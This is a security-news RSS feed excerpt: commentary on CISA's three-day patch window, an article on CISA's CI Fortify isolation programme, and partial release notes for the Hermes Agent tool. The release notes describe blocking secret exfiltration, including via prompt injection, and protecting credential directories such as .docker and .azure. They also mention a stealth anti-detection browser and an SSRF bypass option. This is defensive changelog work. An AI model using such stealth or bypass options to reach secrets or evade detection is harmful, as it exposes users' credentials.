<p>Another expert questioned whether agencies even fully understood their exposure. “Three days is the wrong question. What you’re really asking is whether agencies can find every system they own, know every dependency, and produce evidence that the patch landed. Most can’t, whether it’s day 3 or day 30,” commented <a href="https://www.linkedin.com/in/mitassurix/?originalSubdomain=uk" target="_blank" rel="noreferrer noopener">Mit Patel</a>, founder and CEO of MSP continuous verification company, Assurix.</p>



<p>Patel continued: “CISA’s been running accelerated timelines since 2021, through KEV and BOD 22-01. The 14-day default already gets compressed for the worst CVEs. Going to three days as standard is a tighter version of something we already do. Agencies that hit 14 days reliably will probably hit three days. Agencies that miss 14 days will miss three days by the same margin.”</p>



<p>However, <a href="https://www.linkedin.com/in/adamrossarellano/" target="_blank" rel="noreferrer noopener">Adam Arellano</a>, field CTO at API security company Harness,<strong> </strong>said<strong> </strong>that<strong> </strong>moving to a three-day fix window was only possible if agencies had the processes and technology necessary to achieve it.</p>



<p>“A three-day fixed remediation timeline is completely achievable,” said Arellano. “The process isn’t inherently complex, but it’s been made complex over time, especially within government environments that have been slow to adopt modern technologies. With the right systems in place, this can be a streamlined and manageable process.”</p>



<p>To Arellano, the patching window change is inevitable. “The window between a vulnerability being discovered and exploited is shrinking to minutes and soon may be effectively instantaneous,” he said. “Being able to respond almost immediately will be critical.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CISA pushes critical infrastructure operators to prepare to work in isolation]]></title>
<description><![CDATA[The US Cybersecurity and Infrastructure Security Agency (CISA) has unveiled a new national initiative aimed at helping critical infrastructure operators withstand and recover from major cyberattacks by preparing to operate in isolation from the internet and third-party dependencies.



The progra...]]></description>
<link>https://tsecurity.de/de/3490494/it-security-nachrichten/cisa-pushes-critical-infrastructure-operators-to-prepare-to-work-in-isolation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3490494/it-security-nachrichten/cisa-pushes-critical-infrastructure-operators-to-prepare-to-work-in-isolation/</guid>
<pubDate>Tue, 05 May 2026 19:38:20 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>The US Cybersecurity and Infrastructure Security Agency (CISA) has unveiled a new national initiative aimed at helping critical infrastructure operators withstand and recover from major cyberattacks by preparing to operate in isolation from the internet and third-party dependencies.</p>



<p>The program, <a href="https://www.cisa.gov/topics/industrial-control-systems/ci-fortify" target="_blank" rel="noreferrer noopener">CI Fortify</a>, is designed to ensure that organizations can continue delivering essential services even when their networks are degraded, disconnected, or under active cyberattack. “Resilience and reliability begin with planning and investing,” said acting CISA director Nick Andersen during a media briefing, emphasizing that operators must be ready to function even when cut off from external connectivity.</p>



<p>“CI Fortify gets the doctrine right,” said <a href="https://www.linkedin.com/in/jamesmwinebrenner/" target="_blank" rel="noreferrer noopener">James Winebrenner</a>, CEO of network security vendor Elisity. “What’s missing is the operator-side investment that would make this guidance executable.”</p>



<p>The initiative arrives as US officials warn that adversaries are already pre-positioned inside critical infrastructure networks, with the potential to disrupt electricity, water, and communications during geopolitical conflict.</p>



<h2 class="wp-block-heading">What CISA is trying to solve</h2>



<p>At its core, CI Fortify is about operational resilience under worst-case conditions. CISA is urging organizations to assume that connectivity, particularly to external providers, may not be available during a major incident and to plan accordingly.</p>



<p>That resilience means developing the ability to intentionally disconnect from third-party services, telecommunications, and even portions of their own IT environments, while continuing to operate critical systems. It also means being able to restore compromised systems rapidly while in that isolated state.</p>



<p>CISA officials stress that this is not about traditional air-gapping, but about controlled isolation combined with the ability to operate locally and manually when needed. The goal is to sever adversaries’ access while maintaining essential service delivery.</p>



<p>“When a cyberattack occurs, well-planned emergency capabilities help ensure the affected organization can still deliver critical services,” CISA’s Andersen said.</p>



<p>The agency said it will support the effort through targeted assessments, guidance, and exercises, with a pilot phase already underway and additional much-needed staffing planned to scale the program across sectors.</p>



<p>In practical terms, the initiative pushes organizations to answer difficult questions: How long can they operate without external connectivity? Which dependencies are critical? And what is the minimum viable level of service they must maintain during disruption?</p>



<h2 class="wp-block-heading">A familiar playbook under a new name</h2>



<p>While the framing of CI Fortify is new, the underlying concepts are not. Several experts say the initiative largely repackages long-standing practices around disaster recovery, business continuity, and incident response — areas where many organizations have historically underinvested.</p>



<p>“It looks to me like traditional business continuity planning, disaster recovery, and incident response,” said <a href="https://rickf.org/" target="_blank" rel="noreferrer noopener">Richard Forno</a>, associate director of the UMBC Cybersecurity Institute. “These are things organizations should have long since incorporated into their cybersecurity planning.”</p>



<p>That gap between theory and practice is precisely what CISA is trying to close. The agency’s message is that planning alone is insufficient: Operators must build and test capabilities that work under real-world stress.</p>



<p><a href="https://www.linkedin.com/in/bmoore06/" target="_blank" rel="noreferrer noopener">Bill Moore</a>, CEO of Xona Systems, a secure remote access vendor, framed the issue in architectural terms, arguing that resilience depends on how systems are designed to function during disruption.</p>



<p>“Resilience is not achieved by policy, visibility, or incident response plans alone,” Moore said. “Critical infrastructure operators need architectures that keep essential work moving when networks are segmented, degraded, isolated, or under active cyber stress.”</p>



<h2 class="wp-block-heading">The visibility problem</h2>



<p>One of the biggest challenges facing CI Fortify is that many organizations lack a clear understanding of their own dependencies, particularly in operational technology environments.</p>



<p>Modern critical infrastructure is deeply interconnected, relying on layers of vendors, managed service providers, integrators, and licensing systems. That complexity makes it difficult to map out what needs to be disconnected and what must remain operational during a crisis.</p>



<p>“You can’t plan to operate disconnected from third parties for weeks to months until you can actually list who those third parties are,” Elisity’s Winebrenner said. “Most operators can’t.”</p>



<p>This visibility gap has been highlighted in recent incidents, including one involving <a href="https://www.sec.gov/Archives/edgar/data/780571/000119312526175249/d125229d8k.htm" target="_blank" rel="noreferrer noopener">utility technology provider Itron</a> and another involving <a href="https://www.csoonline.com/article/4155665/iran%E2%80%91linked-plc-attacks-cause-real%E2%80%91world-disruption-at-critical-us-infra-sites.html">Iranian threat actors compromising programmable logic controllers</a> at critical infrastructure facilities, where attackers exploited poorly understood connections into OT environments. Without a comprehensive inventory of dependencies, isolation planning may become largely theoretical.</p>



<p>CISA’s emphasis on assessments and dependency mapping acknowledges this challenge, but closing the gap will require sustained effort—and likely new tooling—on the part of asset owners.</p>



<h2 class="wp-block-heading">Cost, incentives, and reality</h2>



<p>Even when organizations understand what needs to be done, the economics of resilience remain a major barrier.</p>



<p>Building systems that can operate without external dependencies often requires redundant infrastructure, backup systems, and alternative communication channels, all of which come at a cost.</p>



<p>“To do what they are proposing requires having a ton of resources on hot standby, which costs money,” UMBC’s Forno said. “Companies are, in many cases, not going to spend the money to ensure that they can unplug and seamlessly transition.”</p>



<p>That tension between security and cost is likely to shape how CI Fortify is adopted. Industry resistance to past regulatory efforts suggests that voluntary guidance alone may not drive widespread change.</p>



<h2 class="wp-block-heading">Remote access as a control point</h2>



<p>Another key theme is the role of remote access as both a necessity and a risk.</p>



<p>During a disruption, operators, engineers, and vendors still need to access critical systems. But traditional approaches — such as VPNs and broad network-level access — can undermine isolation efforts by expanding the attack surface.</p>



<p>Xona Systems’ Moore argues that remote access must be rethought as a tightly controlled, auditable function designed for crisis conditions.</p>



<p>“Critical infrastructure resilience requires remote access built for crisis conditions: no broad network exposure, no endpoint-to-OT trust assumption, precise session control, and clear evidence of who accessed what, when, and why,” he said.</p>



<p>What CISA is effectively asking operators to do now is confront these critical questions of resilience before a crisis forces the issue. Whether the initiative gains traction will depend less on the clarity of the guidance coming from the government than on whether operators can map their dependencies, justify the cost of resilience, and re-architect access without disrupting the systems they are trying to protect.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hermes Agent v0.7.0 (v2026.4.3)]]></title>
<description><![CDATA[Hermes Agent v0.7.0 (v2026.4.3)
Release Date: April 3, 2026

The resilience release — pluggable memory providers, credential pool rotation, Camofox anti-detection browser, inline diff previews, gateway hardening across race conditions and approval routing, and deep security fixes across 168 PRs a...]]></description>
<link>https://tsecurity.de/de/3488034/downloads/hermes-agent-v070-v202643/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3488034/downloads/hermes-agent-v070-v202643/</guid>
<pubDate>Tue, 05 May 2026 03:01:35 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h1>Hermes Agent v0.7.0 (v2026.4.3)</h1>
<p><strong>Release Date:</strong> April 3, 2026</p>
<blockquote>
<p>The resilience release — pluggable memory providers, credential pool rotation, Camofox anti-detection browser, inline diff previews, gateway hardening across race conditions and approval routing, and deep security fixes across 168 PRs and 46 resolved issues.</p>
</blockquote>
<hr>
<h2>✨ Highlights</h2>
<ul>
<li>
<p><strong>Pluggable Memory Provider Interface</strong> — Memory is now an extensible plugin system. Third-party memory backends (Honcho, vector stores, custom DBs) implement a simple provider ABC and register via the plugin system. Built-in memory is the default provider. Honcho integration restored to full parity as the reference plugin with profile-scoped host/peer resolution. (<a href="https://github.com/NousResearch/hermes-agent/pull/4623" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4623/hovercard">#4623</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/4616" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4616/hovercard">#4616</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/4355" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4355/hovercard">#4355</a>)</p>
</li>
<li>
<p><strong>Same-Provider Credential Pools</strong> — Configure multiple API keys for the same provider with automatic rotation. Thread-safe <code>least_used</code> strategy distributes load across keys, and 401 failures trigger automatic rotation to the next credential. Set up via the setup wizard or <code>credential_pool</code> config. (<a href="https://github.com/NousResearch/hermes-agent/pull/4188" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4188/hovercard">#4188</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/4300" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4300/hovercard">#4300</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/4361" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4361/hovercard">#4361</a>)</p>
</li>
<li>
<p><strong>Camofox Anti-Detection Browser Backend</strong> — New local browser backend using Camoufox for stealth browsing. Persistent sessions with VNC URL discovery for visual debugging, configurable SSRF bypass for local backends, auto-install via <code>hermes tools</code>. (<a href="https://github.com/NousResearch/hermes-agent/pull/4008" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4008/hovercard">#4008</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/4419" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4419/hovercard">#4419</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/4292" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4292/hovercard">#4292</a>)</p>
</li>
<li>
<p><strong>Inline Diff Previews</strong> — File write and patch operations now show inline diffs in the tool activity feed, giving you visual confirmation of what changed before the agent moves on. (<a href="https://github.com/NousResearch/hermes-agent/pull/4411" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4411/hovercard">#4411</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/4423" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4423/hovercard">#4423</a>)</p>
</li>
<li>
<p><strong>API Server Session Continuity &amp; Tool Streaming</strong> — The API server (Open WebUI integration) now streams tool progress events in real-time and supports <code>X-Hermes-Session-Id</code> headers for persistent sessions across requests. Sessions persist to the shared SessionDB. (<a href="https://github.com/NousResearch/hermes-agent/pull/4092" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4092/hovercard">#4092</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/4478" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4478/hovercard">#4478</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/4802" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4802/hovercard">#4802</a>)</p>
</li>
<li>
<p><strong>ACP: Client-Provided MCP Servers</strong> — Editor integrations (VS Code, Zed, JetBrains) can now register their own MCP servers, which Hermes picks up as additional agent tools. Your editor's MCP ecosystem flows directly into the agent. (<a href="https://github.com/NousResearch/hermes-agent/pull/4705" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4705/hovercard">#4705</a>)</p>
</li>
<li>
<p><strong>Gateway Hardening</strong> — Major stability pass across race conditions, photo media delivery, flood control, stuck sessions, approval routing, and compression death spirals. The gateway is substantially more reliable in production. (<a href="https://github.com/NousResearch/hermes-agent/pull/4727" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4727/hovercard">#4727</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/4750" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4750/hovercard">#4750</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/4798" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4798/hovercard">#4798</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/4557" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4557/hovercard">#4557</a>)</p>
</li>
<li>
<p><strong>Security: Secret Exfiltration Blocking</strong> — Browser URLs and LLM responses are now scanned for secret patterns, blocking exfiltration attempts via URL encoding, base64, or prompt injection. Credential directory protections expanded to <code>.docker</code>, <code>.azure</code>, <code>.config/gh</code>. Execute_code sandbox output is redacted. (<a href="https://github.com/NousResearch/hermes-agent/pull/4483" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4483/hovercard">#4483</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/4360" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4360/hovercard">#4360</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/4305" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4305/hovercard">#4305</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/4327" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4327/hovercard">#4327</a>)</p>
</li>
</ul>
<hr>
<h2>🏗️ Core Agent &amp; Architecture</h2>
<h3>Provider &amp; Model Support</h3>
<ul>
<li><strong>Same-provider credential pools</strong> — configure multiple API keys with automatic <code>least_used</code> rotation and 401 failover (<a href="https://github.com/NousResearch/hermes-agent/pull/4188" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4188/hovercard">#4188</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/4300" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4300/hovercard">#4300</a>)</li>
<li><strong>Credential pool preserved through smart routing</strong> — pool state survives fallback provider switches and defers eager fallback on 429 (<a href="https://github.com/NousResearch/hermes-agent/pull/4361" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4361/hovercard">#4361</a>)</li>
<li><strong>Per-turn primary runtime restoration</strong> — after fallback provider use, the agent automatically restores the primary provider on the next turn with transport recovery (<a href="https://github.com/NousResearch/hermes-agent/pull/4624" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4624/hovercard">#4624</a>)</li>
<li><strong><code>developer</code> role for GPT-5 and Codex models</strong> — uses OpenAI's recommended system message role for newer models (<a href="https://github.com/NousResearch/hermes-agent/pull/4498" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4498/hovercard">#4498</a>)</li>
<li><strong>Google model operational guidance</strong> — Gemini and Gemma models get provider-specific prompting guidance (<a href="https://github.com/NousResearch/hermes-agent/pull/4641" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4641/hovercard">#4641</a>)</li>
<li><strong>Anthropic long-context tier 429 handling</strong> — automatically reduces context to 200k when hitting tier limits (<a href="https://github.com/NousResearch/hermes-agent/pull/4747" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4747/hovercard">#4747</a>)</li>
<li><strong>URL-based auth for third-party Anthropic endpoints</strong> + CI test fixes (<a href="https://github.com/NousResearch/hermes-agent/pull/4148" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4148/hovercard">#4148</a>)</li>
<li><strong>Bearer auth for MiniMax Anthropic endpoints</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/4028" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4028/hovercard">#4028</a>)</li>
<li><strong>Fireworks context length detection</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/4158" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4158/hovercard">#4158</a>)</li>
<li><strong>Standard DashScope international endpoint</strong> for Alibaba provider (<a href="https://github.com/NousResearch/hermes-agent/pull/4133" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4133/hovercard">#4133</a>, closes <a href="https://github.com/NousResearch/hermes-agent/issues/3912" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/3912/hovercard">#3912</a>)</li>
<li><strong>Custom providers context_length</strong> honored in hygiene compression (<a href="https://github.com/NousResearch/hermes-agent/pull/4085" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4085/hovercard">#4085</a>)</li>
<li><strong>Non-sk-ant keys</strong> treated as regular API keys, not OAuth tokens (<a href="https://github.com/NousResearch/hermes-agent/pull/4093" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4093/hovercard">#4093</a>)</li>
<li><strong>Claude-sonnet-4.6</strong> added to OpenRouter and Nous model lists (<a href="https://github.com/NousResearch/hermes-agent/pull/4157" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4157/hovercard">#4157</a>)</li>
<li><strong>Qwen 3.6 Plus Preview</strong> added to model lists (<a href="https://github.com/NousResearch/hermes-agent/pull/4376" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4376/hovercard">#4376</a>)</li>
<li><strong>MiniMax M2.7</strong> added to hermes model picker and OpenCode (<a href="https://github.com/NousResearch/hermes-agent/pull/4208" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4208/hovercard">#4208</a>)</li>
<li><strong>Auto-detect models from server probe</strong> in custom endpoint setup (<a href="https://github.com/NousResearch/hermes-agent/pull/4218" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4218/hovercard">#4218</a>)</li>
<li><strong>Config.yaml single source of truth</strong> for endpoint URLs — no more env var vs config.yaml conflicts (<a href="https://github.com/NousResearch/hermes-agent/pull/4165" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4165/hovercard">#4165</a>)</li>
<li><strong>Setup wizard no longer overwrites</strong> custom endpoint config (<a href="https://github.com/NousResearch/hermes-agent/pull/4180" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4180/hovercard">#4180</a>, closes <a href="https://github.com/NousResearch/hermes-agent/issues/4172" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/4172/hovercard">#4172</a>)</li>
<li><strong>Unified setup wizard provider selection</strong> with <code>hermes model</code> — single code path for both flows (<a href="https://github.com/NousResearch/hermes-agent/pull/4200" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4200/hovercard">#4200</a>)</li>
<li><strong>Root-level provider config</strong> no longer overrides <code>model.provider</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/4329" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4329/hovercard">#4329</a>)</li>
<li><strong>Rate-limit pairing rejection messages</strong> to prevent spam (<a href="https://github.com/NousResearch/hermes-agent/pull/4081" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4081/hovercard">#4081</a>)</li>
</ul>
<h3>Agent Loop &amp; Conversation</h3>
<ul>
<li><strong>Preserve Anthropic thinking block signatures</strong> across tool-use turns (<a href="https://github.com/NousResearch/hermes-agent/pull/4626" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4626/hovercard">#4626</a>)</li>
<li><strong>Classify think-only empty responses</strong> before retrying — prevents infinite retry loops on models that produce thinking blocks without content (<a href="https://github.com/NousResearch/hermes-agent/pull/4645" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4645/hovercard">#4645</a>)</li>
<li><strong>Prevent compression death spiral</strong> from API disconnects — stops the loop where compression triggers, fails, compresses again (<a href="https://github.com/NousResearch/hermes-agent/pull/4750" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4750/hovercard">#4750</a>, closes <a href="https://github.com/NousResearch/hermes-agent/issues/2153" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/2153/hovercard">#2153</a>)</li>
<li><strong>Persist compressed context</strong> to gateway session after mid-run compression (<a href="https://github.com/NousResearch/hermes-agent/pull/4095" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4095/hovercard">#4095</a>)</li>
<li><strong>Context-exceeded error messages</strong> now include actionable guidance (<a href="https://github.com/NousResearch/hermes-agent/pull/4155" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4155/hovercard">#4155</a>, closes <a href="https://github.com/NousResearch/hermes-agent/issues/4061" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/4061/hovercard">#4061</a>)</li>
<li><strong>Strip orphaned think/reasoning tags</strong> from user-facing responses (<a href="https://github.com/NousResearch/hermes-agent/pull/4311" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4311/hovercard">#4311</a>, closes <a href="https://github.com/NousResearch/hermes-agent/issues/4285" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/4285/hovercard">#4285</a>)</li>
<li><strong>Harden Codex responses preflight</strong> and stream error handling (<a href="https://github.com/NousResearch/hermes-agent/pull/4313" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4313/hovercard">#4313</a>)</li>
<li><strong>Deterministic call_id fallbacks</strong> instead of random UUIDs for prompt cache consistency (<a href="https://github.com/NousResearch/hermes-agent/pull/3991" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/3991/hovercard">#3991</a>)</li>
<li><strong>Context pressure warning spam</strong> prevented after compression (<a href="https://github.com/NousResearch/hermes-agent/pull/4012" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4012/hovercard">#4012</a>)</li>
<li><strong>AsyncOpenAI created lazily</strong> in trajectory compressor to avoid closed event loop errors (<a href="https://github.com/NousResearch/hermes-agent/pull/4013" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4013/hovercard">#4013</a>)</li>
</ul>
<h3>Memory &amp; Sessions</h3>
<ul>
<li><strong>Pluggable memory provider interface</strong> — ABC-based plugin system for custom memory backends with profile isolation (<a href="https://github.com/NousResearch/hermes-agent/pull/4623" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4623/hovercard">#4623</a>)</li>
<li><strong>Honcho full integration parity</strong> restored as reference memory provider plugin (<a href="https://github.com/NousResearch/hermes-agent/pull/4355" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4355/hovercard">#4355</a>) — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/erosika/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/erosika">@erosika</a></li>
<li><strong>Honcho profile-scoped</strong> host and peer resolution (<a href="https://github.com/NousResearch/hermes-agent/pull/4616" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4616/hovercard">#4616</a>)</li>
<li><strong>Memory flush state persisted</strong> to prevent redundant re-flushes on gateway restart (<a href="https://github.com/NousResearch/hermes-agent/pull/4481" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4481/hovercard">#4481</a>)</li>
<li><strong>Memory provider tools</strong> routed through sequential execution path (<a href="https://github.com/NousResearch/hermes-agent/pull/4803" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4803/hovercard">#4803</a>)</li>
<li><strong>Honcho config</strong> written to instance-local path for profile isolation (<a href="https://github.com/NousResearch/hermes-agent/pull/4037" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4037/hovercard">#4037</a>)</li>
<li><strong>API server sessions</strong> persist to shared SessionDB (<a href="https://github.com/NousResearch/hermes-agent/pull/4802" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4802/hovercard">#4802</a>)</li>
<li><strong>Token usage persisted</strong> for non-CLI sessions (<a href="https://github.com/NousResearch/hermes-agent/pull/4627" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4627/hovercard">#4627</a>)</li>
<li><strong>Quote dotted terms in FTS5 queries</strong> — fixes session search for terms containing dots (<a href="https://github.com/NousResearch/hermes-agent/pull/4549" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4549/hovercard">#4549</a>)</li>
</ul>
<hr>
<h2>📱 Messaging Platforms (Gateway)</h2>
<h3>Gateway Core</h3>
<ul>
<li><strong>Race condition fixes</strong> — photo media loss, flood control, stuck sessions, and STT config issues resolved in one hardening pass (<a href="https://github.com/NousResearch/hermes-agent/pull/4727" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4727/hovercard">#4727</a>)</li>
<li><strong>Approval routing through running-agent guard</strong> — <code>/approve</code> and <code>/deny</code> now route correctly when the agent is blocked waiting for approval instead of being swallowed as interrupts (<a href="https://github.com/NousResearch/hermes-agent/pull/4798" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4798/hovercard">#4798</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/4557" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4557/hovercard">#4557</a>, closes <a href="https://github.com/NousResearch/hermes-agent/issues/4542" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/4542/hovercard">#4542</a>)</li>
<li><strong>Resume agent after /approve</strong> — tool result is no longer lost when executing blocked commands (<a href="https://github.com/NousResearch/hermes-agent/pull/4418" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4418/hovercard">#4418</a>)</li>
<li><strong>DM thread sessions seeded</strong> with parent transcript to preserve context (<a href="https://github.com/NousResearch/hermes-agent/pull/4559" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4559/hovercard">#4559</a>)</li>
<li><strong>Skill-aware slash commands</strong> — gateway dynamically registers installed skills as slash commands with paginated <code>/commands</code> list and Telegram 100-command cap (<a href="https://github.com/NousResearch/hermes-agent/pull/3934" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/3934/hovercard">#3934</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/4005" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4005/hovercard">#4005</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/4006" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4006/hovercard">#4006</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/4010" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4010/hovercard">#4010</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/4023" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4023/hovercard">#4023</a>)</li>
<li><strong>Per-platform disabled skills</strong> respected in Telegram menu and gateway dispatch (<a href="https://github.com/NousResearch/hermes-agent/pull/4799" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4799/hovercard">#4799</a>)</li>
<li><strong>Remove user-facing compression warnings</strong> — cleaner message flow (<a href="https://github.com/NousResearch/hermes-agent/pull/4139" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4139/hovercard">#4139</a>)</li>
<li><strong><code>-v/-q</code> flags wired to stderr logging</strong> for gateway service (<a href="https://github.com/NousResearch/hermes-agent/pull/4474" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4474/hovercard">#4474</a>)</li>
<li><strong>HERMES_HOME remapped</strong> to target user in system service unit (<a href="https://github.com/NousResearch/hermes-agent/pull/4456" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4456/hovercard">#4456</a>)</li>
<li><strong>Honor default for invalid bool-like config values</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/4029" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4029/hovercard">#4029</a>)</li>
